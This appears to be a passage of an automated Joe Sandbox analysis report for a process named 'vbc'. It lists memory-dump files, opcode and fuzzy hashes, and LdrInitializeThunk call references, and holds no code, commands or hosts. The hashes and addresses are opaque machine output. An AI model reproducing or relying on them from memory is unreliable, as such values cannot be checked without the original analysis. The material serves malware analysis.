• Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c60cfca4ebe72fcdf4ac6928e5460d10125d59f9682450870d7616ff320ee495
• Instruction ID: 3aba54842acf319366314c0d3799dd2e6f10e70ac56bfcb6258b580e9cf80a8f
• Opcode Fuzzy Hash: c60cfca4ebe72fcdf4ac6928e5460d10125d59f9682450870d7616ff320ee495
• Instruction Fuzzy Hash: BCB09B729019D5C6DA51E7604A09B27791177D0701F59C061D3030795F4B38C1D1E575

Control-flow Graph

Control-flow graph (rendered graph omitted): single basic block 10, 5612d30-5612d3c, calling LdrInitializeThunk.
APIs
• LdrInitializeThunk.NTDLL(055FA52A,000000FF,?,056C67F8,056AC9A0,00000020,055FA460,056C689C,00000000,0000001D,?,052E2AA0), ref: 05612D3A
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: fea6642171ff10357914cc9d56ad6f5586883a4bbb5e04e3f1ba069e8843f761
• Instruction ID: 4aff3bfa65f7d461aafec5dbbc53c77b9067847115ffbe3214fc39644375951d
• Opcode Fuzzy Hash: fea6642171ff10357914cc9d56ad6f5586883a4bbb5e04e3f1ba069e8843f761
• Instruction Fuzzy Hash: 7090022230191003D140755858596064015D7E1301F95D011E0414758DDD1589569622

Control-flow Graph

Control-flow graph (rendered graph omitted): single basic block 9, 5612d10-5612d1c, calling LdrInitializeThunk.
APIs
• LdrInitializeThunk.NTDLL(0565B508,00000004,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,00000004,000F0007,C0000001,?,00000004), ref: 05612D1A
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 68e70395e0d80961869b43080568b24ff2bce887255d073f47e4094d5ee830ea
• Instruction ID: eb87f1749cceb672a33db9a22042a3fa65ca5b1f630e4307a94a4b6eb9525310
• Opcode Fuzzy Hash: 68e70395e0d80961869b43080568b24ff2bce887255d073f47e4094d5ee830ea
• Instruction Fuzzy Hash: FF90022A21391002D1807558584960A001587D1202FD5D415A001575CDCD1589699721

Control-flow Graph

Control-flow graph (rendered graph omitted): single basic block 12, 5612df0-5612dfc, calling LdrInitializeThunk.
APIs
• LdrInitializeThunk.NTDLL(0565B05B,00000073,?,00000008,00000000,000000FF,00000004), ref: 05612DFA
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c2025168d0cc196f93259b103b67f9a9763567bfafb95aee52ebd80bf2f597fd
• Instruction ID: 5e137bf6e0f84ae1d0f88f385d1b493d9caa7acd8c0056b2961ad9ebc1fd996a
• Opcode Fuzzy Hash: c2025168d0cc196f93259b103b67f9a9763567bfafb95aee52ebd80bf2f597fd
• Instruction Fuzzy Hash: 1890023220191413D11175584945707001987D0241FD5C412A042475CE9E568A52E521

Control-flow Graph

Control-flow graph (rendered graph omitted): single basic block 11, 5612dd0-5612ddc, calling LdrInitializeThunk.
APIs
• LdrInitializeThunk.NTDLL(056291A3,00000000,00000000,?,?,?,055D8A1A,056AC2B0,00000018,055C8873), ref: 05612DDA
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 992f3a3f7f7518b462d374789791b367da2b27a302131774b391f5d10873f2ee
• Instruction ID: bd169d920dd447858d0a510398d34fb190ede29e5b8b5bf36533c16dc135c1f9
• Opcode Fuzzy Hash: 992f3a3f7f7518b462d374789791b367da2b27a302131774b391f5d10873f2ee
• Instruction Fuzzy Hash: 15900222242951525545B5584845507401697E02417D5C012A1414B54D8D269956DA21

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 7 5612c70-5612c7c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(055CFB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,05627BE5,00001000,00004000,000000FF,?,00000000), ref: 05612C7A
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: fb1fe55e9b621635712f2e59d1ae1979246687f854cf7e638a0775573011059c
• Instruction ID: b6bde56269cf1e6d8a64afd89c4d6299ff91fb68fbc2c33da7a70cb5c557ade3
• Opcode Fuzzy Hash: fb1fe55e9b621635712f2e59d1ae1979246687f854cf7e638a0775573011059c
• Instruction Fuzzy Hash: 9990023220199802D1107558884574A001587D0301F99C411A442475CE8E958991B521

Control-flow Graph
• control_flow_graph 8 5612ca0-5612cac LdrInitializeThunk

APIs
• LdrInitializeThunk.NTDLL(055F3999,000000FA,00000001,?,00000050,?,?), ref: 05612CAA
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b8b49422fbffe0e38e4141565c0082c729060a39d7094937129336b1b0fc5edf
• Instruction ID: a88b289c717752f80b17e5d1d9874faff1a95cbdb05e8cbc05772e2a7d1dbc20
• Opcode Fuzzy Hash: b8b49422fbffe0e38e4141565c0082c729060a39d7094937129336b1b0fc5edf
• Instruction Fuzzy Hash: 1A90023220191402D10079985849646001587E0301F95D011A5024759FCE658991A531

Control-flow Graph
• control_flow_graph 15 5612f30-5612f3c LdrInitializeThunk

APIs
• LdrInitializeThunk.NTDLL(055FE6D9,01000000,0000000D,00000000,00000000,00000010,01000000,?,?,?,00100021,00000018,?,00000005,00000060,?), ref: 05612F3A
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 2aa298fb206c5309967782f0b869ad75e138cb4ce3f4c6cd00bd450f79e84f78
• Instruction ID: 0b4027c2bbc2711004137ba6ede9821ea0a3fff8578dee150c559111694d20d1
• Opcode Fuzzy Hash: 2aa298fb206c5309967782f0b869ad75e138cb4ce3f4c6cd00bd450f79e84f78
• Instruction Fuzzy Hash: F490026234191442D10075584855B060015C7E1301F95C015E1064758E8E19CD52A526

APIs
• LdrInitializeThunk.NTDLL(056117E5,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?), ref: 05612FEA
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: eb90f19e970fa5c494c46ade000821050d2904709c2b890d85fbde49cd2fe1de
• Instruction ID: 23b96d374db3f378100053bf7261721a7c9d4e04aa8a797630bbe029191a7a36
• Opcode Fuzzy Hash: eb90f19e970fa5c494c46ade000821050d2904709c2b890d85fbde49cd2fe1de
• Instruction Fuzzy Hash: F3900222211D1042D20079684C55B07001587D0303F95C115A0154758DCD1589619921

Control-flow Graph
• control_flow_graph 17 5612fb0-5612fbc LdrInitializeThunk

APIs
• LdrInitializeThunk.NTDLL(056105E3,00000000,00000000,00000001,00000000,00000000,00000000,?,05612380,056103B6,00000000,00000000,?,00000000,?), ref: 05612FBA
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 208377d0bfc5c36ca7a637b2f4d15bcae78e35ef7f260c6a7364060fcfea7a0a
• Instruction ID: 05862714357635e9c1cb0c91b126b033be53e163a3601644bfd1f21e35fd33b8
• Opcode Fuzzy Hash: 208377d0bfc5c36ca7a637b2f4d15bcae78e35ef7f260c6a7364060fcfea7a0a
• Instruction Fuzzy Hash: 9890022260191042414075688C859064015ABE1211795C121A0998754E8D5989659A65

Control-flow Graph
• control_flow_graph 16 5612f90-5612f9c LdrInitializeThunk

APIs
• LdrInitializeThunk.NTDLL(0564CF47,000000FF,?,?,00000000,?,00000000,?,?), ref: 05612F9A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 54ceaf8607d774ac2e96035f180cc56e7eb3fea5f69ac78aaa54c14ebebb83cd
                                                                                                                                                  • Instruction ID: e0f0138333b4f34750f928d71d950f521013dc64113540cac58ee97a31371ad8
                                                                                                                                                  • Opcode Fuzzy Hash: 54ceaf8607d774ac2e96035f180cc56e7eb3fea5f69ac78aaa54c14ebebb83cd
                                                                                                                                                  • Instruction Fuzzy Hash: 67900232201D1402D10075584C5570B001587D0302F95C011A1164759E8E258951A971

                                                                                                                                                   Control-flow Graph (image): block 5612ea0-5612eac, LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(05631B8A,?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004,?,00000002,?), ref: 05612EAA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 011748e26750a68bcf8962441784c4abbc6476b243005cecf8b91d8003635da0
                                                                                                                                                  • Instruction ID: ee910141918acf4c831fb6c4db9286ffec496ad3ee2fe2b97bacc1beefdc9f29
                                                                                                                                                  • Opcode Fuzzy Hash: 011748e26750a68bcf8962441784c4abbc6476b243005cecf8b91d8003635da0
                                                                                                                                                  • Instruction Fuzzy Hash: 7D90027220191402D14075584845746001587D0301F95C011A5064758F8E598ED5AA65

                                                                                                                                                   Control-flow Graph (image): block 5612e80-5612e8c, LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(0565809B,?,?,?,?,?), ref: 05612E8A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: e7be2412ce467ee3b56e167b24cfefe25c5c244d0ff11cc16611384a62842b39
                                                                                                                                                  • Instruction ID: 658dd7b6c0e19c2ec4a47a91af2503ebd83ddd690982bd8202029a07b10b4f5d
                                                                                                                                                  • Opcode Fuzzy Hash: e7be2412ce467ee3b56e167b24cfefe25c5c244d0ff11cc16611384a62842b39
                                                                                                                                                  • Instruction Fuzzy Hash: B190022260191502D10175584845616001A87D0241FD5C022A1024759FCE258A92E531

                                                                                                                                                   Control-flow Graph (image): block 5612b60-5612b6c, LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(05640DBD,?,?,?,?,05634302), ref: 05612B6A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: c82c0012cc684277f7eb2820094ee107f7f40dd31e38ccc867527f7a852dcf35
                                                                                                                                                  • Instruction ID: c960b27e4c1a8c4f8df99b1a42f07605f182d0d8bec20945eac36cf1881aff76
                                                                                                                                                  • Opcode Fuzzy Hash: c82c0012cc684277f7eb2820094ee107f7f40dd31e38ccc867527f7a852dcf35
                                                                                                                                                  • Instruction Fuzzy Hash: EC90026220291003410575584855616401A87E0201B95C021E1014794ECD258991A525

                                                                                                                                                   Control-flow Graph (image): block 5612bf0-5612bfc, LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(05627BA5,000000FF,?,00000000,?,00001000,00000000,?,-00000018,7D810F61,?,?,?,?), ref: 05612BFA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 1a3789bf97454350fc68cbedd334ddcbe8b3628fc290e85543b4b5c7c4c0b640
                                                                                                                                                  • Instruction ID: bd1f9fd6e40d529a242f69cb63fa191a90ef1827ffb3867c64cf11aa48127f5a
                                                                                                                                                  • Opcode Fuzzy Hash: 1a3789bf97454350fc68cbedd334ddcbe8b3628fc290e85543b4b5c7c4c0b640
                                                                                                                                                  • Instruction Fuzzy Hash: 9590023220191802D1807558484564A001587D1301FD5C015A0025758ECE158B59BBA1

                                                                                                                                                   Control-flow Graph (image): block 5612ad0-5612adc, LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(05649864,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,0561034A,?,?,?,00000003), ref: 05612ADA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 0937e124abc96b511e11067e4015b933b7e05ef354aa2ed833b09bd79e90eb59
                                                                                                                                                  • Instruction ID: d9c0478968f2a712ece8b8beab326ed69ca0762eeda680f65d7ac4dc9e548ef8
                                                                                                                                                  • Opcode Fuzzy Hash: 0937e124abc96b511e11067e4015b933b7e05ef354aa2ed833b09bd79e90eb59
                                                                                                                                                  • Instruction Fuzzy Hash: A3900226211910030105B9580B45507005687D5351395C021F1015754DDE2189619521
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1857527976.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_41f000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 308c1089197b3fc969f318872f1b0b5110b826a2bbb36cdac941b51dfb57a097
                                                                                                                                                  • Instruction ID: e0c41d6df905e6c407450f47118526dbf0db78f192380a61be42cfff92b853c2
                                                                                                                                                  • Opcode Fuzzy Hash: 308c1089197b3fc969f318872f1b0b5110b826a2bbb36cdac941b51dfb57a097
                                                                                                                                                  • Instruction Fuzzy Hash: 31C02B714238143BC160D520CC434B4FB20D901328308034DFC49037038F237863C7C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1857527976.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false
